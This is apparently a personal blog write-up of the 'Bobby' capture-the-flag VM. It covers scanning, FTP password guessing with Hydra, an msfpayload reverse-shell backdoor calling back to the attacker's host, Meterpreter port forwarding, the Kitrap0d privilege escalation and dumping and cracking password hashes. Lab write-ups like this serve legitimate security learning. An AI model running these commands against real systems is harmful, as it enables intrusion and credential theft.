Hi there,
Quick blog post on the VM “Bobby” which is once of the nicest VM I did so far.
Discovery
The first step is always the same: discovering the machine on the network. To do so:
$ nmap -sV 192.168.1.1/24
I managed to retrieve the IP address: 192.168.1.11
.
Let’s start to fingerprint the different services to exploit it.
Fingerprinting
Then, I used Nmap to retrieve the services running:
$ nmap -sV 192.168.1.11
Starting Nmap 6.46 ( http://nmap.org ) at 2014-05-15 20:54 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 5.1
443/tcp closed https
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
Using Nikto as well:
$ ./nikto.pl -h http://192.168.1.11
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2014-05-15 20:56:29 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ Server leaks inodes via ETags, header found with file /, fields: 0x20b456b8599ce1:a02
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2014-05-15 20:56:50 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The page localstart.asp
was asking some credentials but unfortunately I didn’t have them.
I also used DirBuster but I couldn’t find relevant files/directories.
I decided to target the FTP Server. I checked if there was an anonymous access on the FTP but there was none. Unfortunately.
Based on the Web Application I decided to create some custom Wordlist because I didn’t have any clue on what kind of password it could have been .
I used the awesome tool Wyd that extracts single words/strings in some files.
To do so:
wget http://192.168.1.11 -O bobby.html
And then :
./wyd.pl -o bobby.txt bobby.html
The output is:
TheXero-01
Bobby's
blog
Welcome
to
my
personal
blogging
website
but
here
are
a
few
things
about
me
Favourite
film
Matrix
reloaded
music
artist
Daft
Punk
os
Windows
31
bobby
Moreover, I didn’t have any clue on the Username but thanks to the information we retrieved, I thought the username was something like:
Bobby
BOBBY
BOB
BoB
Bob
bob
BOb
...
After cracking it using Hydra, I was able to log in using those credentials: Bob/Matrix. Yay!
ftp> o
(to) 192.168.1.11
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:paul): Bob
331 Password required for Bob.
Password:
230 User Bob logged in.
Remote system type is Windows_NT.
ftp>
Thanks to this access, I found a file called: hint.html
:
*#1 This very common Windows file is not downloaded or interpretered but rather executed server side *
Exploitation
The scenario I have now is to create a reverse meterpreter backdoor, upload it, and execute it by getting to the page
http://192.168.1.11/backdoor.exe
I created the payload using msfpayload:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > /tmp/backdoor.exe
Then, I uploaded the backdoor, had a listener on port 4444 and got a meterpreter session. Good!
However, the meterpreter session stopped few mins later because of some timeout with the Web application". I decided to :
- Re-execute the backdoor by accessing the file through the Web server
- Then, after getting the meterpreter session, execute it again:
execute -f backdoor.exe
- Go in backgroud, and restart a handler.
You need to do it fast enough to catch the connection. Otherwise, you’ll wait, and wait..
Then, I got this second meterpreter session and I was sure this would not terminate because of some timeout. It was time to get SYSTEM privileges!
Getting SYSTEM
The first attempt was to use getsystem
but unfortunately, I didn’t have enough privileges.
I couldn’t migrate to another process.
So, I decided to have a lot at all the processes, and services running on localhost which were not accessible from the outside. That’s where I found the Terminal Server.
I decided to add some route:
route add 127.0.0.1 255.255.255.0 2
I added a route that allowed me target the remote machine with the IP 127.0.0.1. The traffic was tunneled through the meterpreter’s session. Nice trick, like it.
Then, I portforwarded the Terminal Server port: 3389.
I did it like this: portfwd add -l 3389 -p 3389 -r 127.0.0.1
That allowed me to target the local port 3389 and will forward the whole traffic to the remote port 3389. Another nice trick I like with Meterpreter.
Thanks to this, I was able to use rdesktop and log in with Bob account (using password: Matrix). Then, I executed again the backdoor to get a proper user running the process.
I managed to retrieve another meterpreter’s session. I tried to use getsystem
command again but no luck.
However, I remember about an exploit called Kitrap0d.
I checked if it was still in Metasploit (I remember it was another method in getsystem) and I was able to use it. Linked it to my Meterpreter’s session and “Voilà!”, I got SYSTEM privileges. :-)
The metasploit module is: exploit/windows/local/ms10_015_kitrap0d.
Then, I was able to dump hashes from the system:
Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:887f24b0020b273cb90fe7c65f15ca55:c9ee87d435cfd6b9b824e7476e87ee23:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:904376a878474e83e38973eb591a30bf:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
IUSR_BOBBY:1004:cd15c852291896b9bcb0b504caf52a34:290a598ad6db348292cd06eeda96a626:::
IWAM_BOBBY:1005:2b726cbf313f69b4617d49f3866beaad:1dddcc00ab4bcbe9e21b767f8a9a4d9e:::
And then, I cracked the passwords (for fun) using John The Ripper and Administrator’s password was: P@SSW0RD12345.
I hope you liked the write-up which contains (in my opinion) funny tricks by adding some route, doing port forwarding, etc. Cheers and see you soon!